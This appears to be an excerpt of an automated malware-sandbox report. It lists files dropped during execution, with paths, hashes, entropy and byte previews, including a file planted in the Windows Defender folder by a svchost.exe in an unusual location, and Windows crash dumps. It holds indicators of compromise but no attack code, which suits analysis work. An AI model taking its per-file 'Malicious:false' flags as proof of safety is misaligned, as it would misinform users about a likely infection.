                                                                                                                                                                                                            Entropy (8bit):7.9797082546003875
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:n4ak8nl3r9Htb3NJNRG6qJRjjWk5rSV4Z8tPzh3XCV5:4JElb9HN1RG6qJ5jWKW4S8P
                                                                                                                                                                                                            MD5:8390FB2A03D3FF9736AB403A143E16DD
                                                                                                                                                                                                            SHA1:18A6DABD29D92F7478BBE72D1CF446CEEE7FA7CD
                                                                                                                                                                                                            SHA-256:E84AE063EC89EFF8520531B29B22D0A1C0E43E188233A798E0E44FEA5B918D97
                                                                                                                                                                                                            SHA-512:3AB54AE311C241F7064E93CD679BDC594FBF3C6D5BB246B3133467ABD6197CB00039F1A4C9D0D4DF6F3B661C2B6DBD46F46149D5CF11AE5B012823180F283533
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.=. .....J-.c.9.f.W....P7.#.._....E.~..s'S^.PjY.U$..N#....OE..\.......[..k.Zi`D.dk..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\vojyqem.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1094
                                                                                                                                                                                                            Entropy (8bit):7.837350259278631
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHKuCkTXRUubFU:QsSixez1Rg8yakTXRdFU
                                                                                                                                                                                                            MD5:F8EC1411CF7080A2B973060C296B1E8E
                                                                                                                                                                                                            SHA1:2177E0841581A404FBB90A47BA014EC1D7C1E88D
                                                                                                                                                                                                            SHA-256:5B6EC1599F5F6BF1E3A7A8B1F9C6141E71BF307A95AE20C7300D776769AF6432
                                                                                                                                                                                                            SHA-512:3F0EE5605AC2E51DAB6B6F23D959E28089D523FD8F9D049546DC72E432426D9CD966AA17E2CC69CDC9CAB3C61621683DD18238718C35346DE9E96A8C6A2A75A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F%H.....uJ.".e.....-.....,....U....L../..~...S$.%.TXC. evx.....t0..e.z=...P....(.r..`..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^......$.p..|......2.)....7......p=....v...o/M....."..........\...:...(.9>.6..;R*..|........|.N>.,...K.. s...U9}<g....p5..).B..W...f..S...1.[...J....ohU..........#..lk]...v....|...^L..!^..0@.........$.........R.rGY.{.........O4..Y.[2....Q.c..;..... Z.C.`.......=.c..

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_swvGCAxOMikYQeoQ_51257cef13781eb766202ae2527a73e4ed776c22_4c280b26_95466d37-5cfe-4eb5-8b2a-30938c9fca10\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9501653270082964
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:W0F6WeVWzsSChJoI7JfpQXIDcQvc6QcEVcw3cE/3+HbHgnoW6He1Oy1QaSWAEN9F:/fe8z90BU/QjRJkVzuiFnZ24IO8AU
                                                                                                                                                                                                            MD5:C709AFAE1BFABE6F101A32CC1DEC903E
                                                                                                                                                                                                            SHA1:4092BD8B19260C85C6FD1A8E3A5DB1D72E991A53
                                                                                                                                                                                                            SHA-256:175180C51F64D2B7E730AFEB8C1B51CBAC9A9210DDF3314A0613CCD052A5D0A6
                                                                                                                                                                                                            SHA-512:E6151D1253F0AC13BAA25DBFECB31D53F2CD3CDF7BBA5BF4B69CA4BDE32CE551AE27FDFE5A7C94AB5391974B4773495FE9478BCB2080A02A97DC0EE199561537
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.3.6.5.1.6.1.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.4.2.1.4.1.2.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.4.6.6.d.3.7.-.5.c.f.e.-.4.e.b.5.-.8.b.2.a.-.3.0.9.3.8.c.9.f.c.a.1.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.d.e.7.1.c.d.-.8.1.7.6.-.4.4.2.9.-.b.3.1.a.-.5.e.3.f.9.e.e.e.3.0.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.w.v.G.C.A.x.O.M.i.k.Y.Q.e.o.Q.z.i.m.i.p.r.V.u...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.0.-.0.0.0.1.-.0.0.1.3.-.4.6.b.c.-.b.2.8.9.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.e.9.7.d.3.b.c.8.9.3.4.0.0.2.b.d.0.0.8.a.2.e.a.3.d.c.4.e.3.3.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.s.w.v.G.C.A.x.O.M.i.k.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_swvGCAxOMikYQeoQ_51257cef13781eb766202ae2527a73e4ed776c22_4c280b26_afc40bcc-0c14-40e2-bd01-bd76e5dfaf23\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9574698494890729
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:RlFyFTceVWcksSChJoI7JfpQXIDcQvc6QcEVcw3cE/3+HbHgnoW6He1Oy1QaSWAu:zUee8ck90BU/QjRJk1zuiFMZ24IO8AU
                                                                                                                                                                                                            MD5:69F432300697A8FD7529941D0B9555FF
                                                                                                                                                                                                            SHA1:BAB832D5989D4AED8BD8C88F9B2FE8196CAE293A
                                                                                                                                                                                                            SHA-256:64C8EF7EE9976ED932C48CEE6ACE9FB4565B35DC97C2AF01F710D6566D07CA77
                                                                                                                                                                                                            SHA-512:52F731738566DABEC35249CE28A8E1D14BFB2EE1F1B898BD5C790B02FE5A3D6F087FE87E5550FCFFA1D11AAC478012800F488B6E3C95238C7DC7AE40B12E0EDE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.1.4.0.3.4.8.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.5.4.2.9.6.5.9.7.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.c.4.0.b.c.c.-.0.c.1.4.-.4.0.e.2.-.b.d.0.1.-.b.d.7.6.e.5.d.f.a.f.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.e.0.0.7.1.a.-.e.b.a.8.-.4.a.9.7.-.8.5.c.d.-.2.f.5.2.8.8.a.2.a.b.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.w.v.G.C.A.x.O.M.i.k.Y.Q.e.o.Q.z.i.m.i.p.r.V.u...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.8.-.0.0.0.1.-.0.0.1.3.-.2.2.b.d.-.b.9.8.9.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.e.9.7.d.3.b.c.8.9.3.4.0.0.2.b.d.0.0.8.a.2.e.a.3.d.c.4.e.3.3.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.s.w.v.G.C.A.x.O.M.i.k.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D06.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:42 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):98662
                                                                                                                                                                                                            Entropy (8bit):1.9289114140886308
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:YxT1ndr30Gzf48TBzHgYcJnwc8QajTYJ3uYEjbWCKSlAc:Q1ndlzxzfKwc8QajTFYQbfmc
                                                                                                                                                                                                            MD5:6248162409DA39E6202B53948EF5AE19
                                                                                                                                                                                                            SHA1:9D1E0E5DE483BC6AF749C9012819ACC78AC819A0
                                                                                                                                                                                                            SHA-256:439A4704A00DD3CA9FDEBE2057466185C1C216BAA897D09EAC37B4900860D2E1
                                                                                                                                                                                                            SHA-512:1208AF6F18474B3EDFF0B04E1169ED1E172711FA67D5B98C7588B265E521F6A20C2C2A8A49ABDC99C2A9BB192C2C4CB2BD3664E0D8339E784427050F88E4B5E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........>2g....................................d...l?..........T.......8...........T............!..._......................................................................................................eJ......@.......GenuineIntel............T.......`....=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E5E.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:42 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):106730
                                                                                                                                                                                                            Entropy (8bit):1.9330978280707087
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:J7gwUwWlHKbgFznKzHwOmgMnjMOI/aTr4S+8km0aeC8BOqrvsjP:uw4lHKSznKzIgDYdV8BOy
                                                                                                                                                                                                            MD5:0FB639E51B3A603F5FA6BAC3C35B9C1B
                                                                                                                                                                                                            SHA1:3BA344BA053B0D8A2601E26192862B33DB16485D
                                                                                                                                                                                                            SHA-256:49EAE4A1FEE131A3D209B4E80F1714226F0E5046C38AB7E5B93CD5CBBE667EE1
                                                                                                                                                                                                            SHA-512:70A9595CBA92F8C58518E084834F5C0C6343D811C633CB3198622F42CB744FC0078EE15FE0E0CB2580A43255E4F3AECE75C158E830C4C4EC5CABDC7A4F6892F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........>2g....................................t...hB..........T.......8...........T...........H"...~......................................................................................................eJ......p.......GenuineIntel............T.......x....=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER40E0.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                            Entropy (8bit):3.711163533119206
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJB36P6YWoSURgmfv/prz89b5Zsf0K2Tm:R6lXJh6P6YpSURgmfv25yfj
                                                                                                                                                                                                            MD5:F14B1F83B8FD15ADD7AFD2025A75BD63
                                                                                                                                                                                                            SHA1:A1749669F20820AF040F31F474E1D737D91D0EB9
                                                                                                                                                                                                            SHA-256:054AF25F642D5576F71F92D330262BD22DC458BD07CF18F07DC1A9E5EAA4FFDD
                                                                                                                                                                                                            SHA-512:DC6CE3BE7BBDA66466D18D5E174F3AF5052BE259FF2BB564244E4411FBBE929A4AAF4686F51A8F39A226A724194F7E9454176DB5B842ECF08D17CD3577172F04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.4.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER40EF.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                            Entropy (8bit):3.7117476919797907
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJD4686YWCSURgmfv/pr189b5gsfOTm:R6lXJ8686YzSURgmfvQ5zfL
                                                                                                                                                                                                            MD5:1CA21D21636597F7408F00AFDAFEEA2F
                                                                                                                                                                                                            SHA1:21E7456A5366E472A607F9D0703B7108FF90DD04
                                                                                                                                                                                                            SHA-256:F30959B7E57DECD7CEA0D484F1AC509A15808BDEA5ACECEFA78A2787774B7D26
                                                                                                                                                                                                            SHA-512:D0F48D8B94AAF8C98CF83EA788E8E4262BD0D982922AF391260D773BDB982499E3B25E11C58A4342DD32D0CA53137D464A47C7EE49C705C81F392E5FDF337BA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.0.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER411F.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.55170746653968
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYPLAYm8M4JN/mcF0r+q8Uepiq9SZcZdd:uIjf/I7ee7VaLNJN/k9+irZcZdd
                                                                                                                                                                                                            MD5:A3979F468E970D67C99C6FEA0B2F1C35
                                                                                                                                                                                                            SHA1:89676124ECC994E49EB0B99F1F0762998699AA93
                                                                                                                                                                                                            SHA-256:1D8E68C852FB5CB74BAB916AEB48430B739E75964C4AF4384924B5FDE973F5B4
                                                                                                                                                                                                            SHA-512:53F78E6EA3096252DCAA87A9E5DDCA0F6CF29E0A581D075B3D3564D7C321A6BC6E325513FB16DC5FFCC9599E9051D1955DE98C567FF2345122A1FDB301263984
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER412F.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.553300543409523
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYNYm8M4JN/mcFms+q8Ue8iq9SZcZid:uIjf/I7ee7VRJN/8s9HirZcZid
                                                                                                                                                                                                            MD5:CEB3B6CA8E3820260D552C9ED00A4779
                                                                                                                                                                                                            SHA1:BCDB7682B3BEB91BC59ECF8F00AFC89D345A785A
                                                                                                                                                                                                            SHA-256:17C324F9E96556C236A668CEF2E8CB05F618A70B10A6D4AE0E82A51305A7F456
                                                                                                                                                                                                            SHA-512:F1C90F2BFB2F167CBEF018D2C738F94A45F856E878B41DBE2115B45FA1E8CCD0C064EF91920B71B6C4CCFFCEA1CA528B8D205501EA00DF674D033069FFE67E15
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4227.tmp.dmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:42 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):75768
                                                                                                                                                                                                            Entropy (8bit):1.9867576875473307
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:AmExvXAcyfu1izrVQX06ZzHO0I4QumxS8JFiu02bMjyYUbi19:AxXAc2uAzMZzu1wu02MjyG
                                                                                                                                                                                                            MD5:8EAB901E9230C46FA12E72C4F34E01A2
                                                                                                                                                                                                            SHA1:A031D7EDBFC115D9B8AA8C1A86F32842410C26F1
                                                                                                                                                                                                            SHA-256:191016E7F7460BCAB9ACD47D03345C51FC6A047D1B2788BD4B53FD14820126B7
                                                                                                                                                                                                            SHA-512:6900C9A02094BF4CF72B3C9F5F5502EA66CE9F0E42A5F30E5F5B45B7E771FAE56718238E72020C0070079074FF0322500C5143E71C768475FA0E050F78C9473A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MDMP..a..... ........>2g............$...............,.......D....5..........T.......8...........T.......................................................................................................................eJ......D.......GenuineIntel............T.......H....=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER42F3.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8412
                                                                                                                                                                                                            Entropy (8bit):3.7111878559419442
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJXF656YWQSURgmfv/prE89b5kMVsfZTm:R6lXJV656YRSURgmfvD5kMufg
                                                                                                                                                                                                            MD5:8B8B65F080B8F7C95BE58E373B799B1D
                                                                                                                                                                                                            SHA1:9D4BCE21A4645333BB2E9D4CDC39C4AEC4B6E228
                                                                                                                                                                                                            SHA-256:73E522943CE366D9DC0AE0D9A64F98BC35F97494C1008190BF7467BF818A4B14
                                                                                                                                                                                                            SHA-512:67D738E103832ACCC9A6FB7ABDCB1C2364CEDB3DAFB227019D4ECB5F83FED2C7805B78A0727B79A32BD5B2A52942B7C195DC2C62453B2D62828E472D7235B056
                                                                                                                                                                                                            Malicious:false
